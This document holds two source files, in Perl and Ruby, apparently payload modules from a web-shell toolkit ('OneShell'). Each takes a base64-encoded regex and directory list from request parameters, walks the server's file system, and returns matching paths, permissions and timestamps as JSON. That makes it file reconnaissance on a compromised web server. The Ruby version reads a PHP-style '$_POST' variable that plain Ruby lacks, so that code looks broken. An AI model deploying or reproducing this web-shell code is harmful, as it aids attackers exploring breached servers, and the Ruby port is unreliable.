File: Payload/Perl/CGI/OneShell/file_find.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;
use JSON;
use File::Find;
use File::Spec;

sub to_regex {
    my ($string) = @_;
    $string =~ s/^\s+|\s+$//g; # trim

    if ($string =~ m/^([\/#~]).*\1[a-imsuxADSUX]*$/) {
        my $delimiter = $1;
        
        my $pattern = $string;
        $pattern =~ s/^\\$delimiter//;

        my $has_i = ($string =~ m/$delimiter[a-imsuxADSUX]*i[a-imsuxADSUX]*$/) ? 1 : 0;
        
        eval { qr/$pattern/; 1 } or return qr/.*/;
        return $has_i ? qr/$pattern/i : qr/$pattern/;
    }

    if ($string =~ m/\*/ || $string =~ m/\?/) {
        my $escaped = quotemeta($string);
        $escaped =~ s/\\\*/.*/g;
        $escaped =~ s/\\\?/./g;
        return qr/^$escaped$/i;
    }

    if ($string =~ m/[\.\\\\\+\*\?\^\$\[\]\(\)\{\}<>=\!\|:\-]/) {
        my $res = eval { qr/$string/; 1 };
        return qr/$string/ if $res;
    }

    my $escaped = quotemeta($string);
    return qr/$escaped/i;
}

sub fn_get_file_permission {
    my ($file) = @_;
    my @stat_info = lstat($file);
    return 'u---------' unless @stat_info;
    my $perms = $stat_info[2];

    my $info = 'u';
    my $type = $perms & 0xF000;

    if    ($type == 0xC000) { $info = 's'; } # socket
    elsif ($type == 0xA000) { $info = 'l'; } # symbolic link
    elsif ($type == 0x8000) { $info = 'r'; } # regular file
    elsif ($type == 0x6000) { $info = 'b'; } # block special
    elsif ($type == 0x4000) { $info = 'd'; } # directory
    elsif ($type == 0x2000) { $info = 'c'; } # character special
    elsif ($type == 0x1000) { $info = 'p'; } # FIFO pipe

    # Owner
    $info .= ($perms & 0x0100) ? 'r' : '-';
    $info .= ($perms & 0x0080) ? 'w' : '-';
    $info .= ($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-');

    # Group
    $info .= ($perms & 0x0020) ? 'r' : '-';
    $info .= ($perms & 0x0010) ? 'w' : '-';
    $info .= ($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-');

    # World
    $info .= ($perms & 0x0004) ? 'r' : '-';
    $info .= ($perms & 0x0002) ? 'w' : '-';
    $info .= ($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-');

    return $info;
}

sub fn_datetime_conversion {
    my ($timestamp) = @_;
    my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime($timestamp);
    return sprintf("%04d-%02d-%02d %02d:%02d:%02d", $year + 1900, $mon + 1, $mday, $hour, $min, $sec);
}

sub main {
    my $q = CGI->new;
    my $regex_str = decode_base64($q->param('z0') // '');
    my $dirs_str  = decode_base64($q->param('z1') // '');

    my $regex = to_regex($regex_str);
    my $json  = JSON->new->utf8;

    my @dirs = split(/,/, $dirs_str);
    my @target_dirs;

    foreach my $dir (@dirs) {
        $dir =~ s/^\s+|\s+$//g; # trim
        if (-d $dir) {
            push @target_dirs, $dir;
        }
    }

    if (!@target_dirs) {
        print $json->encode({
            status => JSON::false,
            msg    => 'Cannot find any valid directory'
        });
        return;
    }

    my @results;

    eval {
        find({
            wanted => sub {
                my $filename = $_;
                
                return if $filename eq '.' || $filename eq '..';

                if ($filename =~ /$regex/) {
                    my $real_path = File::Spec->rel2abs($File::Find::name);
                    my @stat_info = lstat($filename);
                    return unless @stat_info;

                    push @results, {
                        name          => $filename,
                        path          => $real_path,
                        type          => (-d _) ? 'Directory' : 'File',
                        permission    => fn_get_file_permission($filename),
                        created       => fn_datetime_conversion($stat_info[10]), # ctime
                        last_modified => fn_datetime_conversion($stat_info[9]),  # mtime
                        last_accessed => fn_datetime_conversion($stat_info[8])   # atime
                    };
                }
            },
            no_chdir => 0,
        }, @target_dirs);
        1;
    } or do {
        my $error = $@ || 'Unknown scanning error';
        $error =~ s/ at .* line \d+.*//s;
        print $json->encode({
            status => JSON::false,
            msg    => $error
        });
        return;
    };

    print $json->encode({
        status  => JSON::true,
        results => \@results
    });
}

main();

File: Payload/Ruby/CGI/OneShell/file_find.rb
require 'base64'
require 'json'
require 'find'
require 'etc'

def to_regex(string)
  string = string.to_s.strip
  if string =~ %r{^([/#~]).*\1[a-imsuxADSUX]*$}
    delimiter = $1
    modifiers_str = string.split(delimiter).last
    pattern = string.sub(/^#{Regexp.escape(delimiter)}/, '').sub(/#{Regexp.escape(delimiter)}[a-imsuxADSUX]*$/, '')
    options = modifiers_str.include?('i') ? Regexp::IGNORECASE : 0
    return Regexp.new(pattern, options)
  end

  if string.include?('*') || string.include?('?')
    escaped = Regexp.escape(string)
    regex_pattern = escaped.gsub('\\\*', '.*').gsub('\\\?', '.')
    return Regexp.new("^#{regex_pattern}$", Regexp::IGNORECASE)
  end

  if string =~ /[\.\\\\\+\*\?\^\$\[\]\(\)\{\}<>=\!\|:\-]/
    begin
      return Regexp.new(string)
    rescue RegexpError
    end
  end

  Regexp.new(Regexp.escape(string), Regexp::IGNORECASE)
end

def fn_get_file_permission(file_path)
  stat = File.lstat(file_path)
  
  type = if stat.socket? then 's'
         elsif stat.symlink? then 'l'
         elsif stat.file? then 'r'
         elsif stat.blockdev? then 'b'
         elsif stat.directory? then 'd'
         elsif stat.chardev? then 'c'
         elsif stat.pipe? then 'p'
         else 'u'
         end

  mode = stat.mode

  rwx = [
    (mode & 0o400 != 0 ? 'r' : '-'), (mode & 0o200 != 0 ? 'w' : '-'), '', # Owner
    (mode & 0o040  != 0 ? 'r' : '-'), (mode & 0o020  != 0 ? 'w' : '-'), '', # Group
    (mode & 0o004  != 0 ? 'r' : '-'), (mode & 0o002  != 0 ? 'w' : '-'), ''  # World
  ]

  # Owner
  if mode & 0o4000 != 0
    rwx[2] = (mode & 0o100 != 0 ? 's' : 'S')
  else
    rwx[2] = (mode & 0o100 != 0 ? 'x' : '-')
  end

  # Group
  if mode & 0o2000 != 0
    rwx[5] = (mode & 0o010 != 0 ? 's' : 'S')
  else
    rwx[5] = (mode & 0o010 != 0 ? 'x' : '-')
  end

  # World
  if mode & 0o1000 != 0
    rwx[8] = (mode & 0o001 != 0 ? 't' : 'T')
  else
    rwx[8] = (mode & 0o001 != 0 ? 'x' : '-')
  end

  type + rwx.join
rescue
  "u---------"
end

def fn_datetime_conversion(time_obj)
  time_obj.strftime("%Y-%m-%d %H:%M:%S")
end

def main
  regex_obj = to_regex(Base64.decode64($_POST['z0'].to_s))
  dirs_str  = Base64.decode64($_POST['z1'].to_s)

  dirs = dirs_str.split(',')
  target_dirs = []

  dirs.each do |dir|
    dir_trimmed = dir.strip
    target_dirs << dir_trimmed if Dir.exist?(dir_trimmed)
  end

  if target_dirs.empty?
    print JSON.generate({
      'status' => false,
      'msg' => 'Cannot find any valid directory'
    })
    return
  end

  results = []

  target_dirs.each do |target_dir|
    begin
      Find.find(target_dir) do |path|
        next if path == target_dir

        filename = File.basename(path)
        
        if filename =~ regex_obj
          begin
            stat = File.lstat(path)
            real_path = File.expand_path(path)

            results << {
              'name'          => filename,
              'path'          => real_path,
              'type'          => stat.directory? ? 'Directory' : 'File',
              'permission'    => fn_get_file_permission(path),
              'created'       => fn_datetime_conversion(stat.ctime), # 在 Linux 通常是 狀態改變時間
              'last_modified' => fn_datetime_conversion(stat.mtime),
              'last_accessed' => fn_datetime_conversion(stat.atime)
            }
          rescue => _e
            next
          end
        end
      end
    rescue => e
      print JSON.generate({
        'status' => false,
        'msg' => e.message
      })
      return
    end
  end

  print JSON.generate({
    'status' => true,
    'results' => results
  })
end

main